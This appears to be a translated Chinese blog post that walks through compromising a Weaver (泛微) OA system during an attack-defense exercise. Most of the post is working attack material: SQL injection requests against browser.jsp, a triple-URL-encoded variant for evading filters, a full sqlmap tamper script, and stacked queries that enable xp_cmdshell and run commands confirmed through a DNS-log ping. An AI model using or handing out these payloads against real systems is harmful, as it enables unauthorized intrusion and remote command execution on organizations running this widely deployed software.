During an attack-defense exercise the target turned out to be a Weaver (泛微) OA system. This post walks through getting from a SQL injection to full compromise of the target; the road there was still a winding one.
First, the plain probe. The `keyword` parameter of `browser.jsp` is concatenated into a query, so a UNION pulls `@@VERSION` back into the response. The `+` string concatenation and `@@VERSION` are SQL Server syntax, which is why the later steps reach for `xp_cmdshell`. Only the relevant lines are shown; as a form POST the request also needs `Content-Type: application/x-www-form-urlencoded`.

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {{Hostname}}

isDis=1&browserTypeId=269&keyword=a' union select 1,''+(SELECT @@VERSION)+'

The same `keyword` value is then sent triple URL-encoded (every character percent-encoded, and that output percent-encoded twice more), the usual way of getting past filtering that catches the plain form. The application decodes it back to exactly the payload above:

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {{Hostname}}

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
To drive the injection from sqlmap, the same triple encoding is done by a tamper script (dropped into sqlmap's `tamper/` directory and selected with `--tamper`):

#!/usr/bin/env python
"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    pass


def tamper(payload, **kwargs):
    """
    Percent-encodes every character of the payload, three times over
    (triple URL encoding), e.g.
    a' -> %61%27 -> %25%36%31%25%32%37 -> %2525%2536%2531%2525%2532%2537
    """
    if not payload:
        return payload

    encoded_payload = payload
    for _ in range(3):
        # always two hex digits per character, so bytes below 0x10 encode correctly
        encoded_payload = ''.join('%' + format(ord(c), '02x') for c in encoded_payload)

    return encoded_payload
With SQL Server confirmed, stacked queries turn the injection into command execution. In each body the leading quote closes the application's string literal and the trailing `select'` opens a new one, so the remainder of the original query still parses.

1. Enable xp_cmdshell:
isDis=1&browserTypeId=1&keyword='EXEC sp_configure 'show advanced options',1 select'
isDis=1&browserTypeId=1&keyword='RECONFIGURE select'
isDis=1&browserTypeId=1&keyword='EXEC sp_configure 'xp_cmdshell',1 select'
Note that SQL Server only applies the `xp_cmdshell` setting after a further RECONFIGURE, so the `'RECONFIGURE select'` body has to be sent once more before step 2.
2. Execute a command (the query returns nothing useful, so a DNS-log hostname in place of `dnslog` confirms execution out of band):
isDis=1&browserTypeId=1&keyword='exec master..xp_cmdshell 'ping dnslog' select'
There are also automated tools for the steps above; search GitHub.
Originally published on the WeChat public account 极梦C: 攻防演练-硬啃靶标之泛微OA拿下靶标 (Attack-defense exercise: chewing through the target, taking a Weaver OA).